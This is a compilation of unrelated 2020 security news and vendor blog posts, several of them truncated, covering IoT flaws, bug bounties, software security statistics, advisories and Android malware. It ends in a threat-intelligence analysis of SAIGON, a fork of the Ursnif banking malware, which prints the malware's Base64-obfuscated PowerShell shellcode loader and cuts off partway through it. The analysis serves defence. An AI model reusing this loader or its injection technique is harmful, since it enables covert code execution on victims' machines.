Cybersecurity’s role in evolving technology

As consumer technology continues to evolve, the importance of securing these newfangled devices becomes more and more apparent. According to panelists from the CES session Top Security Trends in Smart Cities, by making products “smarter,” we are also making them more susceptible to hacking. For example, The McAfee Advanced Threat Research (ATR) team recently uncovered security flaws in multiple IoT smart home devices. The first is the Chamberlain MyQ Hub, a “universal” garage door automation platform that can be hacked to cause a user’s garage door to open unintentionally. The second is the McLear NFC Ring, a household access control device used to interact with NFC-enabled door locks, which can be cloned to gain access to a user’s home.

Keep cybersecurity a top priority

Although CES 2020 introduced many new devices aimed at making users’ lives easier, it’s important that users keep a secure home a top priority as these gadgets are brought into their lives. As new McAfee research has revealed, the majority of Americans today (63%) believe that they, as consumers, are responsible for their own security. This could likely be attributed to more Americans becoming aware of online risks, as 48% think an attack is likely to happen to them. To feel confident bringing new technology into their homes, users are encouraged to proactively integrate online security into everyday life.

Need for increased cybersecurity protection

As the sun sets on another fabulous CES, it’s clear that technological innovations won’t be slowing down any time soon. With all of these new advancements and greater connectivity comes the need for increased protection when connected to the internet. All in all, CES 2020 showed us that as technology continues to improve and develop, security will play an ever-increasing role in protecting consumers online.

Stay up to date

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


The post The Top Technology Takeaways From CES 2020 appeared first on McAfee Blogs.

Microsoft rolls out Windows 10 security fix after NSA warning

US agency revealed flaw that could be exploited by hackers to create malicious software

Microsoft is rolling out a security fix to Windows 10 after the US National Security Agency (NSA) warned the popular operating system contained a highly dangerous flaw that could be used by hackers. Reporting the vulnerability represents a departure for the NSA from its past strategy of keeping security flaws under wraps to exploit for its own intelligence needs.

The NSA revealed during a press conference on Tuesday that the “serious vulnerability” could be used to create malicious software that appeared to be legitimate. The flaw “makes trust vulnerable”, the NSA director of cybersecurity, Anne Neuberger, said in a briefing call to media on Tuesday.


Securing open-source: how Google supports the new Kubernetes bug bounty



At Google, we care deeply about the security of open-source projects, as they’re such a critical part of our infrastructure—and indeed everyone’s. Today, the Cloud-Native Computing Foundation (CNCF) announced a new bug bounty program for Kubernetes that we helped create and get up and running. Here’s a brief overview of the program, other ways we help secure open-source projects and information on how you can get involved.

Launching the Kubernetes bug bounty program

Kubernetes is a CNCF project. As part of its graduation criteria, the CNCF recently funded the project’s first security audit, to review its core areas and identify potential issues. The audit identified and addressed several previously unknown security issues. Thankfully, Kubernetes already had a Product Security Committee, including engineers from the Google Kubernetes Engine (GKE) security team, who respond to and patch any newly discovered bugs. But the job of securing an open-source project is never done. To increase awareness of Kubernetes’ security model, attract new security researchers, and reward ongoing efforts in the community, the Kubernetes Product Security Committee began discussions in 2018 about launching an official bug bounty program.

Find Kubernetes bugs, get paid

What kind of bugs does the bounty program recognize? Most of the content you’d think of as ‘core’ Kubernetes, included at https://github.com/kubernetes, is in scope. We’re interested in common kinds of security issues like remote code execution, privilege escalation, and bugs in authentication or authorization. Because Kubernetes is a community project, we’re also interested in the Kubernetes supply chain, including build and release processes that might allow a malicious individual to gain unauthorized access to commits, or otherwise affect build artifacts. This is a bit different from your standard bug bounty as there isn’t a ‘live’ environment for you to test—Kubernetes can be configured in many different ways, and we’re looking for bugs that affect any of those (except when existing configuration options could mitigate the bug). Thanks to the CNCF’s ongoing support and funding of this new program, depending on the bug, you can be rewarded with a bounty anywhere from $100 to $10,000.

The bug bounty program has been in a private release for several months, with invited researchers submitting bugs to help us test the triage process. And today, the new Kubernetes bug bounty program is live! We’re excited to see what kinds of bugs you discover, and we are ready to respond to new reports. You can learn more about the program and how to get involved here.

Dedicated to Kubernetes security

Google has been involved in this new Kubernetes bug bounty from the get-go: proposing the program, completing vendor evaluations, defining the initial scope, testing the process, and onboarding HackerOne to implement the bug bounty solution. Though this is a big effort, it’s part of our ongoing commitment to securing Kubernetes. Google continues to be involved in every part of Kubernetes security, including responding to vulnerabilities as part of the Kubernetes Product Security Committee, chairing the sig-auth Kubernetes special interest group, and leading the aforementioned Kubernetes security audit. We realize that security is a critical part of any user’s decision to use an open-source tool, so we dedicate resources to help ensure we’re providing the best possible security for Kubernetes and GKE.

Although the Kubernetes bug bounty program is new, it isn’t a novel strategy for Google. We have enjoyed a close relationship with the security research community for many years and, in 2010, Google established our own Vulnerability Rewards Program (VRP). The VRP provides rewards for vulnerabilities reported in GKE and virtually all other Google Cloud services. (If you find a bug in GKE that isn’t specific to Kubernetes core, you should still report it to the Google VRP!) Nor is Kubernetes the only open-source project with a bug bounty program. In fact, we recently expanded our Patch Rewards program to provide financial rewards both upfront and after-the-fact for security improvements to open-source projects.

Help keep the world’s infrastructure safe. Report a bug to the Kubernetes bug bounty, or a GKE bug to the Google VRP.

Securing Interactive Kiosks IoTs with the Paradox OS

Article by Bernard Parsons, CEO, Becrypt

Whether it is an EPOS system at a fast food venue or large display system at a public transport hub, interactive kiosks are becoming popular and trusted conduits for transacting valuable data with customers.

The purpose of interactive kiosks, and the reason for their increasing prevalence, is to drive automation and make processes more efficient. For many businesses and government departments, they are the visible and tangible manifestations of their digital transformation.

Kiosks are information exchanges, delivering data and content; ingesting preferences, orders and payments. With so much data going back and forth, there is huge value. However, wherever there is value you’ll find malicious and criminal activities seeking to spoil, subvert or steal it.

Three categories of Cyber Threat
Kiosks are just the latest in a long line of data-driven objects that need protecting. At stake is the very heart (and public face) of digitally evolved organisations.

Threats to kiosks come in three principal forms:
  • Threats to system integrity – where kiosks are compromised to display something different. Losing control of what your kiosks look like undermines your brand and causes distress to customers. A recent example involved a well-known sportswear store in New Zealand, where a kiosk displayed pornography for nine hours before employees arrived the next morning to disconnect it.
  • Threats to system availability – where kiosks are compromised to display nothing. In other words, they go offline and, instead of displaying some kind of reassuring ‘out of order’ message, give the appearance of a desktop computer with frozen dialogue boxes or raw lines of code. Examples of this are all too common, but are typically characterised by ‘the blue screen of death’. 
  • Threats to system confidentiality – where kiosks show no outward signs of compromise, but are in fact collecting data illegally. Such attacks carry significant risk over and above creating nuisance or offence. Examples include one of the largest self-service food vending companies in the US suffering a stealthy attack whereby the payment card details and even biometric data gleaned from users at kiosks may have been jeopardised.
The challenge of curbing these threats is compounded by interactive kiosks’ great virtue: their connectedness. As with any Internet of Things (IoT) endpoint architecture, the potential routes for attack are numerous and could spread from attacks on a company’s internal network, stem from vulnerabilities in kiosk application software, or even result from a direct assault on the kiosk itself.

How Best Practice Regulatory Standards Apply to Kiosks
Regulatory compliance plays a part here, with the EU GDPR and NIS directive (ably supported by comprehensive guidance proffered via the UK NCSC Cyber Assessment Framework) compelling organisations to consider all parts of their endpoint estates with appropriate operational controls, processes and risk management approach in respect of – for example – patch management, privileged user access and data encryption.

Regulatory reforms are all well and good, but technology (AI, machine learning, blockchain, etc.) is evolving rapidly and organisations must be as proactive about the cybersecurity challenge as possible or risk falling behind the digital innovation curve.

Becrypt work with the UK Government and the National Cyber Security Centre (NCSC), to develop solutions in line with core objectives sought by NIS and other regulations, for use in public sector environments. At the same time, we are seeing private sector businesses increasingly coming under the sorts of cyberattacks more commonly associated with the public sector.

Paradox: The Secure, Linux-based OS for Interactive Kiosks
Government research has determined that the best way to mitigate threats to interactive kiosks, and safeguard wider digital transformation objectives, is to secure the kiosk operating system (OS).

Becrypt have developed Paradox, a secure Linux-based OS and management platform for kiosks, in collaboration with the NCSC. Paradox incorporates a secure-by-design architecture, ensuring kiosks remain in a known healthy state, free of malware. For organisations concerned about the potential for attack, this provides strong assurance that every time a machine is switched on, its OS and all its applications have not been compromised.

Likewise, another common concern with kiosks is managing hundreds or even thousands of geographically dispersed devices without being able to check on or remediate system health. Should it detect anything unusual, Paradox will automatically roll back to the last known good state, presenting a functioning system rather than an offline or unavailable one. This avoids the onset of ‘bluescreen’ failures and allows administrators to visualise and manage kiosks in an easy and low-cost way. Automated security and patch management further ensures that devices are always kept up to date.
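
Conceptually, “remaining in a known healthy state” boils down to verifying measured components against a known-good manifest and rolling back when anything deviates. The sketch below illustrates that general idea only; the manifest path, format and rollback() stub are assumptions for illustration and are not a description of Paradox’s actual implementation.

```python
import hashlib
import json
from pathlib import Path


def sha256(path: Path) -> str:
    """Hash a file in chunks so large components don't need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_manifest(manifest_path: Path) -> bool:
    """Compare every listed component against its known-good hash."""
    manifest = json.loads(manifest_path.read_text())  # e.g. {"/usr/bin/kiosk-app": "ab12..."}
    return all(sha256(Path(p)) == expected for p, expected in manifest.items())


def rollback():
    # Placeholder: a real system would re-image from a signed, read-only snapshot.
    print("Integrity check failed: rolling back to last known good state")


if __name__ == "__main__":
    if not verify_manifest(Path("/etc/known-good-manifest.json")):
        rollback()
```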

Paradox is also a very lightweight OS, which shrinks the potential attack surface and ensures the entire kiosk estate is not susceptible to common exploits. It also carries a number of advanced security controls that make it more difficult to attack, such as a sandboxed user account for privilege escalation prevention. OS components are also mounted as ‘read-only’, thereby preventing persistent, targeted attacks.

Spurred on by consumer demand for deeper interactions and easier, more personalised experiences, the exponential growth in interactive kiosks is plain to see in public spaces everywhere. And as this shift encourages more private and public sector organisations to do more with their data, the onus is on all of us to protect it.

State of Software Security v10: 5 Key Takeaways for Developers

In case you missed it, this year we launched our 10th annual State of Software Security (SOSS X) report! Armed with a decade of data, the Veracode team analyzed 85,000 applications to study trends in fix rates, mounting security debt, shifts in vulnerability by language, and more.

What did we uncover? At the core of our research, we found there’s still a need for better remediation processes and more frequent security scans. But we also uncovered some best practices that are leading to significant application security improvements. Read on for a snapshot of key takeaways that can help set you and your organization up for AppSec success in 2020.

Most apps still don’t pass crucial compliance tests

OWASP Top 10 vulnerabilities and SANS 25 software errors represent consensus listings of the most critical flaws in the industry, and while we’ve seen some changes in compliance rates across past editions of our SOSS report, the 10-year trend shows us that things haven’t shifted much as of late. Today, 68 percent of apps fail to pass OWASP on initial scan (down from 77 percent in volume one of SOSS), and 67 percent of apps fail to pass SANS on initial scan, the same figure as in volume one.

The fact that these common and serious vulnerabilities are still prevalent in code underscores the fact that we are not creating environments where developers can code securely. The absence of proper secure coding training, as well as the lack of access to the right tools, is clearly creating risk.

Android, PHP, iOS, and C++ have a high frequency of flaws

This year’s data analysis found that over 90 percent of Android, PHP, and iOS applications contain security flaws on initial scan. Ranking over 80 percent were C++, .NET, and Java, while Python and JavaScript came in with the lowest flaw rates.

Language Scans

Why do we see a higher rate of flaws in mobile languages? Perhaps the reason Android and iOS are two of the top offenders is that many mobile applications aren’t properly scanned before they’re uploaded to the Apple App Store and the Google Play Store. Ben Greenwald, Director of Software Engineering at Veracode, explains further:

“One reason Android and iOS applications may tend to have more security flaws on first scan is because mobile developers believe they are already covered. Developers might assume that Apple and Google thoroughly test apps before they’re released, or they rely on Apple and Google for testing under the assumption that a security infrastructure is already in place.”

This issue only further highlights the need for thorough internal and third-party testing processes to ensure that your applications are secure.

Language also adds yet another layer to the issue of unfixed flaws piling up on developer plates; the average security debt for PHP and C++ is massive compared to that of .NET, Android, Java, and JavaScript.

Language Flaw Debt

As two of the top languages for flaw rates, it makes sense that unchecked issues in PHP and C++ can spin out of control for development teams. So, what’s their deal? PHP’s start in the mid-90s came with a basic design that works well for smaller applications and beginners learning to code, but it has since been so widely adopted and stretched beyond its means that it is left highly vulnerable to flaws.

C++ is an incredibly robust language that powers many of the operating systems, browsers, and productivity apps that we use in our daily lives. But with that great power comes the great responsibility to manage memory, guard against use-after-free, and keep stacks from exceeding the fill line. These flaws tend to accumulate over time and are easier to introduce than in many of today’s more commonly used higher-level languages.

While some applications are prone to debt buildup because they use multiple languages or a basic flaw-heavy language like PHP, it’s important to consider the steps your team can take to counterbalance the prevalence of flaws, like reprioritization.

Remediation priorities are misaligned for top vulnerabilities

Out of the 85,000 applications tested (including 1.4 million individual scans), our data shows that 83 percent of apps have at least one flaw when they’re initially scanned. That’s an 11 percent increase from volume one to volume ten of the SOSS report, but the good news is we also saw an overall 14 percent decrease in applications with high-severity flaws.

The bad news? Focus is, it seems, not always placed on fixing the right flaws. For example, we found that A10-Logging is ranked the lowest in flaw prevalence but is at the top of the list for fix rate, the bottom of the list for incidents, and doesn’t rank for exploit risk. A5-Access Control is another mystifying trend. It ranks low in prevalence but towards the top of exploit and incident rankings, falling right in the middle of the list for fix rate.

Some flaws and fixes are consistent, though. Both A1-Injection and A2-Authentication sit toward the top of the list across the board, while A8-Deserialization is reliably stable in the bottom half of each category. This discrepancy sheds some light on which flaws are neglected, deferred, targeted, and prioritized, and how DevOps teams can more efficiently rank issues.

Flaws that can be remediated quickly on a small scope are naturally resolved ahead of flaws that are slightly more complicated, but often those severe issues are less difficult to fix, underscoring the need for a more comprehensive plan of attack.

Developers favor recency, adding to security debt

SOSS X shows us that developers typically follow a LIFO (Last In, First Out) method instead of a FIFO (First In, First Out) approach. With LIFO, developers run the risk of contributing to security debt when older flaws are stacked underneath newer issues. As time goes by, the probability of remediation drops significantly, and any unmitigated remnants slide into the land of security debt.
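
To see why the LIFO habit feeds security debt, the toy simulation below remediates a fixed number of findings per sprint in either LIFO or FIFO order; under LIFO the oldest findings are never reached and quietly age into debt. The backlog and sprint size are arbitrary and only illustrate the ordering effect.

```python
from collections import deque

flaws = deque(f"flaw-{i:03d}" for i in range(10))  # flaw-000 is the oldest finding
FIXES_PER_SPRINT = 3


def remediate(backlog: deque, strategy: str) -> list:
    """Fix FIXES_PER_SPRINT items, taken from the newest end (LIFO) or the oldest end (FIFO)."""
    fixed = []
    for _ in range(min(FIXES_PER_SPRINT, len(backlog))):
        fixed.append(backlog.pop() if strategy == "LIFO" else backlog.popleft())
    return fixed


print("LIFO sprint fixes:", remediate(deque(flaws), "LIFO"))  # newest flaws first; old ones linger
print("FIFO sprint fixes:", remediate(deque(flaws), "FIFO"))  # oldest flaws first
```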

This trend highlights an ongoing battle with security debt across the industry and draws attention to how it muddies the waters of remediation. Fortunately, we have revealing data on scanning cadence that can help reduce an organization’s debt over time.

Bursty scans contribute to security debt, but it’s reversible

We mention security debt throughout the SOSS X report (and this post) because it can leave organizations vulnerable to attacks in the backlog of flaws, and slower to mitigate issues that arise out of the blue.

The good news is, this year we also uncovered evidence of practices that are chipping away at security debt. It’s all about scanning frequency. We know that “bursty” scanning cadences result in a higher prevalence of flaws over time, as opposed to steady and early scan processes with fewer flaws open at once. Sometimes bursty scanning simply fits your waterfall development cycle or pairs with testing schedules that are event-driven, but this can leave security holes where flaws are missed month to month.

Bursty Scans

Based on our data, we know that development teams can improve their median time to remediation (MedianTTR) by about 70 percent with established procedures and consistent testing schedules. Automating your processes to increase scanning tempo and improve prioritization reduces the security debt that your organization carries.
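
Median time to remediation itself is straightforward to track from scan history: for each closed finding, take the days between first detection and remediation, then take the median. The sketch below assumes a simple list of date pairs and is only meant to show the metric, not Veracode’s internal calculation.

```python
from datetime import date
from statistics import median

# Hypothetical findings as (first_detected, remediated) date pairs.
findings = [
    (date(2019, 1, 10), date(2019, 2, 1)),
    (date(2019, 3, 5), date(2019, 3, 20)),
    (date(2019, 6, 1), date(2019, 9, 1)),
]

days_to_fix = [(closed - opened).days for opened, closed in findings]
print(f"MedianTTR: {median(days_to_fix)} days")
```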

Read the report

Want to see all this data in one complete package? Read the full SOSS report to learn more about the state of DevSecOps, discover additional data highlights by industry, and more.

Advisory 2020-001-4: Active exploitation of critical vulnerability in Citrix Application Delivery Controller and Citrix Gateway

The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC) is aware of ongoing attempts to exploit a critical vulnerability in Citrix Application Delivery Controller (ADC) (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway) and Citrix SD-WAN WANOP. The vulnerability, known as CVE-2019-19781, was disclosed on 17 December 2019 and enables an unauthenticated adversary to execute arbitrary code.

Less is More: 5 Ways to Jumpstart a ‘Digital Minimalist’ Mindset  


Editor’s Note: This is part II of a series on Digital Minimalism in 2020.

Is this the year you rethink and rebuild your relationship with technology? If so, embracing digital minimalism may be the most powerful way to achieve that goal.

We learned last week, in the first post of this series, that digital minimalism isn’t about chucking your devices and going off the grid. It’s about being hyper-intentional that your technology choices support the things you value.

And, as outlined by Cal Newport in his book, Digital Minimalism: Choosing a Focused Life in a Noisy World, the first step in the process is clarifying your values. Your values are the guiding principles that motivate you and give your life meaning such as family, education, work/life balance, community service, friendship, integrity, health, or wealth. With values clearly defined, you can evaluate every piece of technology, app, or social network you use to be sure it aligns with those values.

For instance, if you establish your top values to be family and volunteering, then maybe it’s time to let go of all the podcasts, apps, and email subscriptions that no longer support those priorities. The online social communities you habitually peruse may trigger anxiety and be taking time from activities that could be far more fulfilling.

If you get overwhelmed amid your technology pruning, come back to these two critical questions:

  • Does this technology directly support something that I deeply value?
  • Is this technology the best way to support this value?


There’s a ton of great information as well as passion online around the concept of digital minimalism. But to keep this new idea “minimal” and easy to grasp, we’ve chosen 5 things you can do today to help you and your family jumpstart this new way of thinking.

5 ways to jumpstart a ‘digital minimalist’ mindset

  1. Make social accounts private. Last week we suggested cutting all non-essential media for 30 days. Another way to mentally shift into a minimalist mindset is to transition your social media accounts from public to private if you haven’t already. Not only will this small change increase your online privacy, but it could also help you become more aware of the amount of content you share, the people with whom you share it, and the value of what you share. For people who post frequently (and often out of habit), this may prove to be a game-changer. The goal of digital minimalism isn’t a digital detox or white-knuckling no-or-less-tech life. The goal is to consciously, willingly, and consistently be rebuilding your relationship with technology into a formula that decreases distraction and increases value.
  2. Audit those apps! Want to feel a rush of minimalist adrenaline? Whack some apps! Most of us have amassed a galaxy of apps on our phones, tablets, and laptops. Newport suggests getting rid of any apps or devices that continuously distract and are “outside of work.” Those brain games, cooking apps, calorie trackers, and delivery apps you rarely use or value, may no longer be relevant to your values. Some will find this exercise exhilarating, while others may feel panicked. If that’s the case, pace yourself and delete a handful of apps over the next few weeks. The goal is more peace, not panic. On a security note: Remember, apps are one of the main channels for malware. Consider adding security software to your family devices, reading app reviews, and only downloading trusted products.
  3. Reclaim your space. Do you carry your phone with you into restaurants, upstairs, on a walk, and even to the bathroom? If so, this step may be especially tricky but incredibly beneficial. Think about it — you weren’t born with a phone. Over the years, it became a companion, maybe even an extra appendage. So start small to reclaim your birthright to phone-free space. If you go outside to walk your dog, leave your phone inside. Are you headed into a restaurant? Leave the phone in the car. Newport also suggests leaving your phone in a fixed spot in your home and treating it like the “house phones” of the past. When you go to bed, leave your phone in another room. Over time, hopefully, these small changes will add more hours, sleep, relaxation, conversation, and contemplation to your day.
  4. Condense home screens, turn off all notifications. Clutter — especially digital clutter — can trigger feelings of chaos and anxiety. By creating folders for random files and apps on your laptop, tablet, and phone, you can declutter and breathe a little easier. If later you can’t find a document, use the search tool on your device. Also, turn off all notifications, including your phone ringer, to reduce interruptions and to avoid the temptation to phub (phone snub) the person in front of you.
  5. Replace device time with more productive activities. The pain and regret of the social media time suck are very real. We lose days, even years going down digital rabbit holes and getting emotionally invested in random social media posts and exchanges. Some ideas: If you are a night scroller, opt to read a physical book. If you take breaks to scroll during work hours, put your phone in a drawer — out of sight, out of mind. If you’ve defined “relaxing” as curling up with your coffee and phone and reading through social feeds, reclaim those hours by calling a friend, taking a walk, connecting with your family, reading, or getting outside.

Embracing a new mindset, especially when it comes to our sacred technology habits, won’t be an easy task. However, if you know (and yes, you do know) that technology is taking up too much of your time, attention, and emotional bandwidth, then 2020 may be the perfect time to release digital distractions, rethink your technology choices, and reclaim the things that matter most.

The post Less is More: 5 Ways to Jumpstart a ‘Digital Minimalist’ Mindset   appeared first on McAfee Blogs.

The Consequences of Security Breaches Are Becoming More Severe

With the prevalence of cyberattacks, breaches, and data leaks heading into 2020, it's becoming commonplace for employees to part ways with their organization after a security incident. Although the consequences from a breach were less severe in the past, reactions are shifting as data leaks are deemed more dire than ever before.

A 2018 report from Kaspersky Lab surveyed 6,000 people in 29 countries and found that, globally, 31 percent of cybersecurity incidents resulted in the layoff of employees at impacted companies. In roughly a third of these cases, those employees holding senior IT positions were most often let go from their roles after a breach or security incident.

The results from Kaspersky's survey also revealed that 32 percent of C-level managers and CEOs in the United States were laid off post-breach. That number is lower in other countries but still higher overall than most functional roles within and outside of IT, representing a growing trend in how organizations respond to breach backlash. As cybersecurity professionals are in high demand and C-level managers cost a pretty penny, making the decision to part ways is not always easy.

Weathering the post-breach storm

With great power comes great responsibility. Jun Ying, the CIO of Equifax U.S. Information Solutions at the time of the company's 2017 breach, was later sent to jail and forced to pay $55,000 for insider trading after it was discovered that he traded on information about the breach before it was made public by the company. Uber's CSO Joe Sullivan was let go in 2017 after he allegedly helped cover up a bug bounty pay-out of over $100,000, paying attackers in exchange for the deletion of stolen data on 57 million drivers and passengers. Both Sullivan and security lawyer Craig Clark were fired from the company.

Sometimes privacy-minded employees clash with their own organization's policies, and the fallout can eliminate a role altogether. For example, Facebook's former CSO, Alex Stamos, left a security role at the social media powerhouse after he allegedly disagreed with how Facebook handled the very public Cambridge Analytica scandal. In 2018, Facebook made the decision not to replace Stamos and to instead rely on introducing security engineers, analysts, investigators, and other specialists into their engineering and product teams. It was a testament to how fast things can change within an organization's security team.

In other situations, ex-employees can cause unanticipated headaches with ripple effects of their own. Capital One fell prey to cyberattacker Paige Thompson when she infiltrated the company's third-party cloud server to access 106 million customer records in 2019. Thompson, previously an Amazon Web Services software engineer, allegedly built a scanning tool that looked for misconfigured cloud servers on the web providing easy access to username and password credentials.

These examples lead to a logical question: if your business is unable to fortify its internal processes and protect sensitive information, is it trustworthy to consumers? With a solid plan for security and remediation in place, the risk of job loss and consumer distrust diminishes.

Getting serious about your security

As breaches and cyberattacks lead to high-profile firings that play out in the media, the public is paying attention. A recent IDG Survey Report, Security as a Competitive Advantage, found that 66 percent of respondents are more likely to work with a vendor whose application security has been validated by an established, independent expert.

Additionally, 99 percent of those surveyed for the report welcome the advantages of working with a certified and secure vendor, such as improved protection of IP data that leads to peace of mind for their customers. There are measures your organization can take to boost customer confidence, give you a competitive advantage, and potentially prevent the loss (monetary or otherwise) from a breach or cyberattack.

In addition to incorporating security testing into your software development, third-party validation of your security efforts shows prospects and customers alike that securing data is a top priority in your organization???s application development process.

Independent security validation comes with a number of benefits, enabling vendors to:

  • Proactively address any questions a prospect might have about security
  • Instill confidence in buyers that they're choosing a vendor who cares about their data
  • Speed up sales cycles by eliminating the need for back-and-forth validation
  • Stay one step ahead of security concerns from customers and prospects
  • Integrate more efficiently with development teams to improve security

With third-party validation in place, you not only have proof positive that your organization cares about security, but also a roadmap for maturing your application security program. The risk of losing employees to high-profile incidents also diminishes. Eliminating concern and doubt sets you apart with a competitive advantage in the marketplace that sends a clear message to buyers: you're serious about security.

Learn how the Veracode Verified program can help position you as a trusted and secure vendor so that you're ready when a prospect comes calling.

Skype audio graded by workers in China with ‘no security measures’

Exclusive: former Microsoft contractor says he was emailed login after minimal vetting

A Microsoft programme to transcribe and vet audio from Skype and Cortana, its voice assistant, ran for years with “no security measures”, according to a former contractor who says he reviewed thousands of potentially sensitive recordings on his personal laptop from his home in Beijing over the two years he worked for the company.

The recordings, both deliberate and accidentally invoked activations of the voice assistant, as well as some Skype phone calls, were simply accessed by Microsoft workers through a web app running in Google’s Chrome browser, on their personal laptops, over the Chinese internet, according to the contractor.

Continue reading...

PHA Family Highlights: Bread (and Friends)





Fake positive reviews appear first, with comments like:
“So..good..”
“very beautiful”
Later, 1-star reviews from real users start appearing with comments like:
“Deception”
“The app is not honest …”

SUMMARY

Sheer volume appears to be the preferred approach for Bread developers. At different times, we have seen three or more active variants using different approaches or targeting different carriers. Within each variant, the malicious code present in each sample may look nearly identical with only one evasion technique changed. Sample 1 may use AES-encrypted strings with reflection, while Sample 2 (submitted on the same day) will use the same code but with plaintext strings.
At peak times of activity, we have seen up to 23 different apps from this family submitted to Play in one day. At other times, Bread appears to abandon hope of making a variant successful and we see a gap of a week or longer before the next variant. This family showcases the amount of resources that malware authors now have to expend. Google Play Protect is constantly updating detection engines and warning users of malicious apps installed on their device.

SELECTED SAMPLES

Package Name SHA-256 Digest
com.rabbit.artcamera 18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f
org.horoscope.astrology.predict 6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26
com.theforest.rotatemarswallpaper 4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09
com.jspany.temp 0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5
com.hua.ru.quan 780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86
com.rongnea.udonood 8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131
com.mbv.a.wp 01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68
com.pho.nec.sg b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b

SAIGON, the Mysterious Ursnif Fork

Ursnif (aka Gozi/Gozi-ISFB) is one of the oldest banking malware families still in active distribution. While the first major version of Ursnif was identified in 2006, several subsequent versions have been released in large part due to source code leaks. FireEye reported on a previously unidentified variant of the Ursnif malware family to our threat intelligence subscribers in September 2019 after identification of a server that hosted a collection of tools, which included multiple point-of-sale malware families. This malware self-identified as "SaiGon version 3.50 rev 132," and our analysis suggests it is likely based on the source code of the v3 (RM3) variant of Ursnif. Notably, rather than being a full-fledged banking malware, SAIGON's capabilities suggest it is a more generic backdoor, perhaps tailored for use in targeted cybercrime operations.

Technical Analysis

Behavior

SAIGON appears on an infected computer as a Base64-encoded shellcode blob stored in a registry key, which is launched using PowerShell via a scheduled task. As with other Ursnif variants, the main component of the malware is a DLL file. This DLL has a single exported function, DllRegisterServer, which is an unused empty function. All the relevant functionality of the malware executes when the DLL is loaded and initialized via its entry point.

Upon initial execution, the malware generates a machine ID using the creation timestamp of either %SystemDrive%\pagefile.sys or %SystemDrive%\hiberfil.sys (whichever is identified first). Interestingly, the system drive is queried in a somewhat uncommon way, directly from the KUSER_SHARED_DATA structure (via SharedUserData→NtSystemRoot). KUSER_SHARED_DATA is a structure located in a special part of kernel memory that is mapped into the memory space of all user-mode processes (thus shared), and always located at a fixed memory address (0x7ffe0000, pointed to by the SharedUserData symbol).
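
For illustration, the following Python sketch (Windows only) retrieves the two inputs described above: the system drive read directly from KUSER_SHARED_DATA and the creation timestamp of pagefile.sys or hiberfil.sys. The 0x30 offset of NtSystemRoot comes from public KUSER_SHARED_DATA definitions and is an assumption on our part; the final machine-ID derivation is not documented here, so treat this purely as a sketch of the inputs rather than a re-implementation of SAIGON's algorithm.

import ctypes
import os

# KUSER_SHARED_DATA is mapped read-only into every user-mode process at a fixed
# address, so it can be read without any API call. The NtSystemRoot offset (0x30)
# is taken from public structure definitions (assumption, not stated in the post).
KUSER_SHARED_DATA = 0x7FFE0000
NT_SYSTEM_ROOT_OFFSET = 0x30

def system_drive_from_kuser_shared_data() -> str:
    system_root = ctypes.wstring_at(KUSER_SHARED_DATA + NT_SYSTEM_ROOT_OFFSET)
    return system_root[:2]  # e.g. "C:"

def machine_id_seed() -> float:
    drive = system_drive_from_kuser_shared_data()
    for name in ("pagefile.sys", "hiberfil.sys"):
        path = os.path.join(drive + "\\", name)
        if os.path.exists(path):
            # st_ctime is the creation time on Windows; how SAIGON turns this
            # timestamp into the final machine ID is not documented here.
            return os.stat(path).st_ctime
    raise FileNotFoundError("neither pagefile.sys nor hiberfil.sys found")

if __name__ == "__main__":
    print(system_drive_from_kuser_shared_data(), machine_id_seed())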

The code then looks for the current shell process by using a call to GetWindowThreadProcessId(GetShellWindow(), …). The code also features a special check; if the checksum calculated from the name of the shell's parent process matches the checksum of explorer.exe (0xc3c07cf0), it will attempt to inject into the parent process instead.

SAIGON then injects into this process using the classic VirtualAllocEx / WriteProcessMemory / CreateRemoteThread combination of functions. Once this process is injected, it loads two embedded files from within its binary:

  • A PUBLIC.KEY file, which is used to verify and decrypt other embedded files and data coming from the malware's command and control (C2) server
  • A RUN.PS1 file, which is a PowerShell loader script template that contains a "@SOURCE@" placeholder within the script:

$hanksefksgu = [System.Convert]::FromBase64String("@SOURCE@");
Invoke-Expression ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("JHdneG1qZ2J4dGo9JGh
hbmtzZWZrc2d1Lkxlbmd0aDskdHNrdm89IltEbGxJbXBvcnQoYCJrZXJuZWwzMmAiKV1gbnB1YmxpYyBzdGF
0aWMgZXh0ZXJuIEludDMyIEdldEN1cnJlbnRQcm9jZXNzKCk7YG5bRGxsSW1wb3J0KGAidXNlcjMyYCIpXWB
ucHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldERDKEludFB0ciBteHhhaHhvZik7YG5bRGxsSW1wb3J0K
GAia2VybmVsMzJgIildYG5wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgQ3JlYXRlUmVtb3RlVGhyZWFkKEl
udFB0ciBoY3d5bHJicywgSW50UHRyIHdxZXIsdWludCBzZmosSW50UHRyIHdsbGV2LEludFB0ciB3d2RyaWN
0d2RrLHVpbnQga2xtaG5zayxJbnRQdHIgdmNleHN1YWx3aGgpO2BuW0RsbEltcG9ydChgImtlcm5lbDMyYCI
pXWBucHVibGljIHN0YXRpYyBleHRlcm4gVUludDMyIFdhaXRGb3JTaW5nbGVPYmplY3QoSW50UHRyIGFqLC
BVSW50MzIga2R4c3hldik7YG5bRGxsSW1wb3J0KGAia2VybmVsMzJgIildYG5wdWJsaWMgc3RhdGljIGV4dG
VybiBJbnRQdHIgVmlydHVhbEFsbG9jKEludFB0ciB4eSx1aW50IGtuYnQsdWludCB0bXJ5d2h1LHVpbnQgd2d1
